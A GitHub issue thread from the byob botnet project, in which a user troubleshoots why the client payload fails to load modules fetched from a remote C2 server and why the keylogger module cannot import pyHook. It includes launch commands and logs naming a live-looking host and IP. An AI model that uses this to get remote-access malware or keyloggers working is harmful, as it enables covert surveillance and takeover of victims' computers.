### ISSUE TITLE
OSError: Cannot load native module

### ISSUE THREAD

**Issue by Dagdelo** [malwaredllc/byob#55]
Server: `python server.py --port 4040`
Client: `python client.py dagseals.dlinkddns.com 4040 --name test6 --compress --encrypt`
After trying to run the test6.py on the target the program fails to load.

> OSError: Cannot load native module 'Cryptodome.Cipher._raw_ecb': Trying '_raw_ecb.pyd': [Error 126] NÒo foi possÝvel encontrar o m¾dulo especificado.

For e.g:

> DEBUG:__main__:Trying to import 'Cryptodome.Util._raw_api.platform' as package from: 'http://dagseals.dlinkddns.com:4042/Cryptodome/Util/_raw_api/platform/__init__.py'
INFO:__main__:[-] 'Cryptodome.Util._raw_api.platform' is not a package (HTTP Error 404: File not found)

This dir actually not exists on server. But **http://dagseals.dlinkddns.com:4042/Cryptodome/Util/_raw_api.py** exists. The same problem for others module requests.

The full [log ](https://pastebin.com/sHs0qdJS)error.

**Comment by malwaredllc** [comment]
Thank you for bringing this to my attention. This bug should now be fixed - try it out with a fresh install and let me know if the issue persists.

**Comment by Dagdelo** [comment]
After some testing (Keylogger module try) I found this issue persists in some ways... First when I ran the payload in the client the cmd window remain active and open during the experiment. If I close the cmd the connection close too. But is it good to save the logs and debug so, going on:

Initial output after executing the payload.
>(Line 236) 
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: colorama.initialise.ansitowin32
DEBUG:__main__:Path: ['http://dagseals.dlinkddns.com:4042/colorama/']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition...
INFO:__main__:[+] Module/Package 'colorama.initialise.ansitowin32' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading colorama.initialise.ansitowin32...
DEBUG:__main__:Trying to import 'colorama.initialise.ansitowin32' as package from: 'http://dagseals.dlinkddns.com:4042/colorama/initialise/ansitowin32/__init__.py'
INFO:__main__:[-] 'colorama.initialise.ansitowin32' is not a package (HTTP Error 404: File not found)
DEBUG:__main__:[+] Trying to import 'colorama.initialise.ansitowin32' as module from: 'http://dagseals.dlinkddns.com:4042/colorama/initialise/ansitowin32.py'
INFO:__main__:[-] 'colorama.initialise.ansitowin32' is not a module (HTTP Error 404: File not found)

In server side I run shell 1; keylogger run . And produces this log in the client:

> (line 491)
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: keylogger.pyHook
DEBUG:__main__:Path: ['http://189.124.157.127:4041/']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition...
INFO:__main__:[+] Module/Package 'keylogger.pyHook' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading keylogger.pyHook...
DEBUG:__main__:Trying to import 'keylogger.pyHook' as package from: 'http://189.124.157.127:4041/keylogger/pyHook/__init__.py'
INFO:__main__:[-] 'keylogger.pyHook' is not a package (HTTP Error 404: File not found)
DEBUG:__main__:[+] Trying to import 'keylogger.pyHook' as module from: 'http://189.124.157.127:4041/keylogger/pyHook.py'
INFO:__main__:[-] 'keylogger.pyHook' is not a module (HTTP Error 404: File not found)
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyHook
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyHook
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:load error: No module named pyHook
DEBUG:__main__:run error: 'keylogger'

So recaptulating: the payload can connect. But: 1. Appears to some modules can't be loaded (e.g colorama.initialise.ansitowin32) and 2. The Keylogger cant import/load pyhook module as well.

The full log [here](https://pastebin.com/Q9zcNAJE).
